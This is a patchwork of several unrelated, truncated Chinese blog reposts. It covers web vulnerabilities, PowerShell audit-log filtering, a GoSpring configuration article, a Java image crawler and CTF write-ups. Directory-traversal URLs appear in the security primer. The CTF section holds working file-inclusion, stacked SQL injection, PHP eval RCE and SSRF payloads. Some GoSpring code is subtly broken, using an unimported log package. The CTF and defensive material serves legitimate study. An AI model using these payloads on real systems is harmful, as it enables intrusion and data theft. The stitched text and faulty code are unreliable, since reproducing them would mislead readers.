userIdmysql.query('SELECT FROM msg_table WHERE msg_id = ? AND user_id = ?',[msgId, userId]); 嗯，大概就是这个意思，如果有更严格的权限控制，那在每个请求中凡是涉及到数据库的操作都需要先进行严格的验证，并且在设计数据库表的时候需要考虑进 userId 的账号关联以及权限关联。 目录遍历漏洞 目录遍历漏洞指通过在 URL 或参数中构造 …/，./ 和类似的跨父目录字符串的 ASCII 编码、unicode 编码等，完成目录跳转，读取操作系统各个目录下的敏感文件，也可以称作「任意文件读取漏洞」。 目录遍历漏洞原理：程序没有充分过滤用户输入的 …/ 之类的目录跳转符，导致用户可以通过提交目录跳转来遍历服务器上的任意文件。使用多个… 符号，不断向上跳转，最终停留在根 /，通过绝对路径去读取任意文件。 目录遍历漏洞几个示例和测试，一般构造 URL 然后使用浏览器直接访问，或者使用 Web 漏洞扫描工具检测，当然也可以自写程序测试。 http://somehost.com/../../../../../../../../../etc/passwdhttp://somehost.com/some/path?file=../../Windows/system.ini 借助 %00 空字符截断是一个比较经典的攻击手法http://somehost.com/some/path?file=../../Windows/system.ini%00.js 使用了 IIS 的脚本目录来移动目录并执行指令http://somehost.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ 防御 方法就是需要对 URL 或者参数进行 …/，./ 等字符的转义过滤。 物理路径泄漏 物理路径泄露属于低风险等级缺陷，它的危害一般被描述为「攻击者可以利用此漏洞得到信息，来对系统进一步地攻击」，通常都是系统报错 500 的错误信息直接返回到页面可见导致的漏洞。得到物理路径有些时候它能给攻击者带来一些有用的信息，比如说：可以大致了解系统的文件目录结构；可以看出系统所使用的第三方软件；也说不定会得到一个合法的用户名（因为很多人把自己的用户名作为网站的目录名）。 防止这种泄漏的方法就是做好后端程序的出错处理，定制特殊的 500 报错页面。 源码暴露漏洞 和物理路径泄露类似，就是攻击者可以通过请求直接获取到你站点的后端源代码，然后就可以对系统进一步研究攻击。那么导致源代码暴露的原因是什么呢？基本上就是发生在服务器配置上了，服务器可以设置哪些路径的文件才可以被直接访问的，这里给一个 koa 服务起的例子，正常的 koa 服务器可以通过 koa-static 中间件去指定静态资源的目录，好让静态资源可以通过路径的路由访问。比如你的系统源代码目录是这样的： |- project|- src|- static|- ...|- server.js 你想要将 static 的文件夹配成静态资源目录，你应该会在 server.js 做如下配置： const Koa = require('koa');const serve = require('koa-static');const app = new Koa();app.use(serve(__dirname + '/project/static')); 但是如果配错了静态资源的目录，可能就出大事了，比如： // ...app.use(serve(__dirname + '/project')); 这样所有的源代码都可以通过路由访问到了，所有的服务器都提供了静态资源机制，所以在通过服务器配置静态资源目录和路径的时候，一定要注意检验，不然很可能产生漏洞。 最后，希望 Web 开发者们能够管理好自己的代码隐私，注意代码安全问题，比如不要将产品的含有敏感信息的代码放到第三方外部站点或者暴露给外部用户，尤其是前端代码，私钥类似的保密性的东西不要直接输出在代码里或者页面中。也许还有很多值得注意的点，但是归根结底还是绷住安全那根弦，对待每一行代码都要多多推敲。 请关注我的订阅号 本篇文章为转载内容。原文链接：https://blog.csdn.net/MrCoderStack/article/details/88547919。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...TML文档遍历、事件处理、动画设计以及Ajax交互等复杂任务，使开发者能够以更简洁、高效的方式编写和维护JavaScript代码。 window.location.href , 在JavaScript中，window.location对象包含了当前窗口的位置信息。其中href属性表示完整的URL（统一资源定位符），即浏览器地址栏显示的当前页面的完整网址，包括协议、主机名、端口号、路径和查询字符串等组成部分。 AJAX , AJAX全称为\ Asynchronous JavaScript and XML\ （异步JavaScript与XML），是一种创建动态网页应用的技术，允许网页在不重新加载整个页面的情况下，与服务器交换数据并更新部分网页内容。在文章中提到的JQuery的$.ajax()方法就是实现AJAX请求的一个便捷接口，通过它可以发送GET、POST等HTTP请求到指定URL，并在请求成功或失败时执行回调函数进行相应的数据处理和界面更新。

...实并删除相应内容。 Windows日志筛选 因工作需求开启文件系统审核，因Windows日志管理器并不方便筛选查阅，所以使用powershell方法进行筛选。 一、需求分析 存在问题 日志量巨大（每天约1G） 日志管理器查询日志不便 主要目标 启用文件系统审核 快捷查询用户的删除操作 解决方案 采用轮替方式归档日志（500MB） 日志存放60天（可用脚本删除超过期限日志档案） 使用Get-WinEvent中的FilterXPath过日志进行筛选，格式打印 删除操作码为0x10000，可对其进行筛选 二、文件审核设置 2.1 开启文件系统审核功能 secpol.msc Advanced Audit Policy Configuration Object Access Audit File System [x] Configure the following audit events: [x] Success [x] Failure 2.2 建立共享文件夹 Folder Properties Sharing Choose people to share with Everyone 2.3 设置文件夹审核的用户组 Folder Properties Security Advanced Auditing Add user 2.4 设置日志路径及大小 Event Viewer Windows Logs Security Log Properties Log Path: E:\FileLog\Security.evtx Maximum log size(KB): 512000 [x] Archive the log when full,do not overwrite events 三、方法 筛选事件ID为4460日志 PS C:\Windows\system32> Get-WinEvent -LogName Security -FilterXPath "[System[EventID=4660]]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 10:01:37 AM 4660 Information An object was deleted....5/22/2018 9:03:11 AM 4660 Information An object was deleted.... 筛选文件删除日志 PS C:\Windows\system32> Get-WinEvent -LogName "Security" -FilterXPath "[EventData[Data[@Name='AccessMask']='0x10000']]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 10:01:37 AM 4663 Information An attempt was made to access an object....5/22/2018 9:03:11 AM 4663 Information An attempt was made to access an object.... 筛选指定用户文件删除日志 PS C:\Windows\system32> Get-WinEvent -LogName "Security" -FilterXPath "[EventData[Data[@Name='AccessMask']='0x10000']] and [EventData[Data[@Name='SubjectUserName']='lxy']]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 9:03:11 AM 4663 Information An attempt was made to access an object.... 以变量方式筛选指定用户文件删除日志 PS C:\Windows\system32> $AccessMask='0x10000'PS C:\Windows\system32> $UserName='lxy'PS C:\Windows\system32> Get-WinEvent -LogName "Security" -FilterXPath "[EventData[Data[@Name='AccessMask']='$AccessMask']] and [EventData[Data[@Name='SubjectUserName']='$UserName']]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 9:03:11 AM 4663 Information An attempt was made to access an object.... 从保存的文件筛选文件删除日志 PS C:\Users\F2844290> Get-WinEvent -Path 'C:\Users\F2844290\Desktop\SaveSec.evtx' -FilterXPath "[EventData[Data[@Name='AccessMask']='0x10000']]"PS C:\Windows\system32> $AccessMask='0x10000' 筛选10分钟内发生的安全性日志 XML中时间计算单位为ms，10minute=60 10 1000=600000 PS C:\Windows\system32> Get-WinEvent -LogName Security -FilterXPath "[System[TimeCreated[timediff(@SystemTime) < 600000]]]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object....5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object....5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object....5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object.... 其它筛选方法 若有语法不明之处，可参考日志管理器中筛选当前日志的XML方法。 删除超过60天的存档日志并记录 Get-ChildItem E:\FileLog\Archive-Security- | Where-Object {if(( (get-date) - $_.CreationTime).TotalDays -gt 60 ){Remove-Item $_.FullName -ForceWrite-Output "$(Get-Date -UFormat "%Y/%m%d")t$_.Name" >>D:\RoMove-Archive-Logs.txt} } 四、其它文件 文件删除日志结构 Log Name: SecuritySource: Microsoft-Windows-Security-AuditingDate: 5/22/2018 9:03:11 AMEvent ID: 4663Task Category: File SystemLevel: InformationKeywords: Audit SuccessUser: N/AComputer: IDX-ST-05Description:An attempt was made to access an object.Subject:Security ID: IDX-ST-05\lxyAccount Name: lxyAccount Domain: IDX-ST-05Logon ID: 0x2ed3b8Object:Object Server: SecurityObject Type: FileObject Name: C:\Data\net.txtHandle ID: 0x444Process Information:Process ID: 0x4Process Name: Access Request Information:Accesses: DELETEAccess Mask: 0x10000Event Xml:<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /><EventID>4663</EventID><Version>0</Version><Level>0</Level><Task>12800</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime="2018-05-22T01:03:11.876720000Z" /><EventRecordID>1514</EventRecordID><Correlation /><Execution ProcessID="4" ThreadID="72" /><Channel>Security</Channel><Computer>IDX-ST-05</Computer><Security /></System><EventData><Data Name="SubjectUserSid">S-1-5-21-1815651738-4066643265-3072818021-1004</Data><Data Name="SubjectUserName">lxy</Data><Data Name="SubjectDomainName">IDX-ST-05</Data><Data Name="SubjectLogonId">0x2ed3b8</Data><Data Name="ObjectServer">Security</Data><Data Name="ObjectType">File</Data><Data Name="ObjectName">C:\Data\net.txt</Data><Data Name="HandleId">0x444</Data><Data Name="AccessList">%%1537</Data><Data Name="AccessMask">0x10000</Data><Data Name="ProcessId">0x4</Data><Data Name="ProcessName"></Data></EventData></Event> 文件操作码表 File ReadAccesses: ReadData (or ListDirectory)AccessMask: 0x1File WriteAccesses: WriteData (or AddFile)AccessMask: 0x2File DeleteAccesses: DELETEAccessMask: 0x10000File RenameAccesses: DELETEAccessMask: 0x10000File CopyAccesses: ReadData (or ListDirectory)AccessMask: 0x1File Permissions ChangeAccesses: WRITE_DACAccessMask: 0x40000File Ownership ChangeAccesses: WRITE_OWNERAccessMask: 0x80000 转载于:https://blog.51cto.com/linxy/2119150 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_34112900/article/details/92532120。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

GoSpring: 使用环境变量与配置文件进行灵活配置 在软件开发领域，配置管理是构建可扩展、可维护应用的关键环节。嘿，兄弟！如果你在用Go语言搞应用开发，那GoSpring框架绝对是你的超级好帮手！它就像个魔法师，能让你的应用配置变得既高效又灵活，就像是给你的应用穿上了一件超酷的魔法斗篷，让你随心所欲地调整和控制它的各种设置，简直不要太爽！本文将深入探讨如何利用GoSpring通过环境变量和配置文件来实现应用的动态配置，从而提升应用的灵活性和可定制性。 一、引入GoSpring GoSpring是一个基于Go语言的微服务框架，它提供了丰富的功能，如自动路由、健康检查、日志记录等，旨在简化微服务架构的开发和部署。Hey，小伙伴们！GoSpring 这家伙可真聪明，它能理解咱们编程时的各种小秘密，比如环境变量和配置文件这种事儿。这东西就像咱们做饭时的调料，根据不同的场合加点盐，加点酱油，让味道刚刚好。GoSpring 就是这么干的，它让开发者们能轻松地调整应用的行为，不管是在家做饭（开发本地环境）还是去朋友家吃饭（部署到远程服务器），都能得心应手，满足各种口味的需求。是不是觉得它更像一个贴心的朋友，而不是冷冰冰的机器人呢？ 二、环境变量的运用 环境变量是操作系统提供的变量，可以在运行时修改程序的行为。在GoSpring中，通过os包的Env变量，可以方便地读取和设置环境变量。例如： go package main import ( "fmt" "os" ) func main() { // 读取环境变量 environment := os.Getenv("ENVIRONMENT") fmt.Printf("当前环境为：%s\n", environment) // 设置环境变量 os.Setenv("ENVIRONMENT", "production") environment = os.Getenv("ENVIRONMENT") fmt.Printf("设置后的环境为：%s\n", environment) } 这段代码展示了如何读取和设置环境变量。哎呀，你知道吗？在咱们的实际操作里，这些变量就像魔法师的魔法棒一样，能帮我们区分出开发、测试、生产这些不同的工作环境。就像是在厨房里，你有专门的调料盒来放做菜时需要用到的不同调料，这样就能确保每道菜的味道都刚刚好。咱们这些变量也是这么个道理，它们帮助我们确保在不同环境下程序运行得既稳定又高效！ 三、配置文件的集成 配置文件是存储应用配置信息的一种常见方式。GoSpring通过内置的配置解析器，支持读取JSON、YAML或XML格式的配置文件。下面是一个简单的JSON配置文件示例： json { "app": { "name": "MyApp", "version": "1.0.0", "environment": "development" }, "database": { "host": "localhost", "port": 5432, "username": "myuser", "password": "mypassword", "dbname": "mydb" } } 在Go代码中，我们可以使用yaml或json包来解析这个配置文件： go package main import ( "encoding/json" "fmt" "io/ioutil" "log" "github.com/spf13/viper" ) func main() { viper.SetConfigFile("config.json") // 设置配置文件路径 if err := viper.ReadInConfig(); err != nil { // 读取配置文件 log.Fatalf("Error reading config file: %v", err) } // 获取配置数据 appName := viper.GetString("app.name") appVersion := viper.GetString("app.version") dbHost := viper.GetString("database.host") fmt.Printf("应用名称：%s, 版本：%s, 数据库主机：%s\n", appName, appVersion, dbHost) } 通过这种方式，我们可以在不修改代码的情况下，通过更改配置文件来改变应用的行为，极大地提高了应用的可维护性和灵活性。 四、整合环境变量与配置文件 在实际项目中，通常会结合使用环境变量和配置文件来实现更复杂的配置管理。例如，可以通过环境变量来控制配置文件的加载路径，或者根据环境变量的值来选择使用特定的配置文件： go package main import ( "os" "path/filepath" "testing" "github.com/spf13/viper" ) func main() { // 设置环境变量 os.Setenv("CONFIG_PATH", "path/to/your/config") // 读取配置文件 viper.SetConfigType("yaml") // 根据你的配置文件类型进行设置 viper.AddConfigPath(os.Getenv("CONFIG_PATH")) // 添加配置文件搜索路径 err := viper.ReadInConfig() if err != nil { log.Fatalf("Error reading config file: %v", err) } // 获取配置数据 // ... } 通过这种方式，我们可以根据不同环境（如开发、测试、生产）使用不同的配置文件，同时利用环境变量动态调整配置路径，实现了高度灵活的配置管理。 结语 GoSpring框架通过支持环境变量和配置文件的集成，为开发者提供了强大的工具来管理应用配置。哎呀，这种灵活劲儿啊，可真是帮了大忙！它就像个魔法师，能让你的开发工作变得轻松愉快，效率嗖嗖的往上窜。而且，别看它这么灵巧，稳定性却是一点儿也不含糊。不管是在哪个环境里施展它的魔法，都能保持一贯的好状态，稳如泰山。这就像是你的小伙伴，无论走到哪儿，都能给你带来安全感和惊喜，你说赞不赞？哎呀，兄弟，你懂的，现在咱们的应用就像个大家庭，人多了，事儿也杂了，对吧？这时候，怎么管好这个家庭，让每个人都各司其职，不乱套，就显得特别重要了。这就得靠咱们合理的配置管理策略来搞定。比如说，得有个清晰的分工，谁负责啥，一目了然；还得有规矩，比如更新软件得按流程来，不能随随便便；还得有监控，随时看看家里人都在干啥，有问题能及时发现。这样，咱们的应用才能健健康康地成长，不出岔子。所以，合理的配置管理策略，简直就是咱们应用界的定海神针啊！嘿，兄弟！这篇文章就是想给你开开小灶，让你能轻松掌握 GoSpring 在配置管理这块儿的厉害之处。别担心，我不会用一堆冰冷的术语把你吓跑，咱俩就像老朋友聊天一样，把这玩意儿讲得跟吃饭喝水一样简单。跟着我，你就能发现 GoSpring 配置管理有多牛逼，怎么用都顺手，让你的工作效率嗖嗖地往上涨！咱们一起探索，一起享受技术带来的乐趣吧！

...。 首先是要获取桌面路径，在utils包下创建Download类，添加getDesktop方法，代码如下： public static File getDesktop(){FileSystemView fsv = FileSystemView.getFileSystemView();File path=fsv.getHomeDirectory(); return path;} 接着我们再该类中添加下载图片的方法： //urlPath为网络图片的路径，savePath为要保存的本地路径（这里指定为桌面下的images文件夹）public static void download(String urlPath,String savePath) throws Exception {// 构造URLURL url = new URL(urlPath);// 打开连接URLConnection con = url.openConnection();//设置请求超时为5scon.setConnectTimeout(51000);// 输入流InputStream is = con.getInputStream();// 1K的数据缓冲byte[] bs = new byte[1024];// 读取到的数据长度int len;// 输出的文件流File sf=new File(savePath);int randomNo=(int)(Math.random()1000000);String filename=urlPath.substring(urlPath.lastIndexOf("/")+1,urlPath.length());//获取服务器上图片的名称filename=new java.text.SimpleDateFormat("yyyy-MM-dd-HH-mm-ss").format(new Date())+randomNo+filename;//时间+随机数防止重复OutputStream os = new FileOutputStream(sf.getPath()+"\\"+filename);// 开始读取while ((len = is.read(bs)) != -1) {os.write(bs, 0, len);}// 完毕，关闭所有链接os.close();is.close();} 写好后，我们再完善一下JsouPic中的getPic方法。 public static void getPic(String kind) throws Exception {//get请求方式进行请求Document root_doc = Jsoup.connect("http://www.netbian.com/" + kind + "/").get();//获取分页标签，用于获取总页数Elements els = root_doc.select("main .page a");Integer page = Integer.parseInt(els.eq(els.size() - 2).text());for (int i = 1; i < page; i++) {Document document = null;//这里判断的是当前页号是否为1，如果为1就不拼页号，否则拼上对应的页号if (i == 1) {document = Jsoup.connect("http://www.netbian.com/" + kind + "/index.htm").get();} else {document = Jsoup.connect("http://www.netbian.com/" + kind + "/index_" + i + ".htm").get();}File desktop = Download.getDesktop();Download.checkPath(desktop.getPath() + "\\images\\" + kind);//获取每个分页链接里面a标签的链接，进入链接页面获取当前图拼的大尺寸图片Elements elements = document.select("main .list li a");for (Element element : elements) {String href = element.attr("href");if (href.startsWith("/")) {String picUrl = "http://www.netbian.com" + href;Document document1 = Jsoup.connect(picUrl).get();Elements elements1 = document1.select(".endpage .pic p a img");Download.download(elements1.attr("src"), desktop.getPath() + "\\images\\" + kind);} }} } 在Download类中，我添加了checkPath方法，用于判断目录是否存在，不存在就创建一个。 public static void checkPath(String savePath) throws Exception {File file = new File(savePath);if (!file.exists()){file.mkdirs();} } 最后在mainapp包内创建PullPic类，并添加主方法。 package com.asahi.mainapp;import com.asahi.common.Kind;import com.asahi.common.PrintLog;import com.asahi.utils.JsoupPic;import java.util.Scanner;public class PullPic {public static void main(String[] args) throws Exception {new PullPic().downloadPic();}public void downloadPic() throws Exception {System.out.println("启动程序>>\n请输入所爬取的分类：");Scanner scanner = new Scanner(System.in);String kind = scanner.next();while(!Kind.contains(kind)){System.out.println("分类不存在，请重新输入：");kind = scanner.next();}System.out.println("分类输入正确！");System.out.println("开始下载>>");JsoupPic.getPic(kind);} } 三、成果展示 最终的运行结果如下： 最终的代码已上传到我的github中，点击“我的github”进行查看。 在学习Java爬虫的过程中，我收获了很多，一开始做的时候确实遇到了很多困难，这次写的获取图片也是最基础的，还可以继续深入。本来我想写一个通过多线程来获取图片来着，也尝试着去写了一下，越写越跑偏，暂时先放着不处理吧，等以后有时间再来弄，我想问题应该不大，只是考虑的东西有很多。希望大家多多指点不足，有哪些需要改进的地方，我也好多学习学习๑乛◡乛๑。 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_39693281/article/details/108463868。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号，然后返回问号的位置，就是=4//所以想绕过这里，直接?flag，他检测到的问号就是0，然后0，0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话，empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入：1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 （为2） 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来，这个符号是 esc下面一个的按键，这个符号在mysql里 用于 分割其他命令，表示此为（表名、字段名） 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢？ select 函数被过滤了，其实mysql的函数有很多 这里通过 MYSQL的预处理语句，使用 : concat（'s','elect',' from 1919810931114514'） 完成绕过 构造pyload： 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字，字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说，没有回显，联合查询基本没戏。 好在页面会进行相应的变化，证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 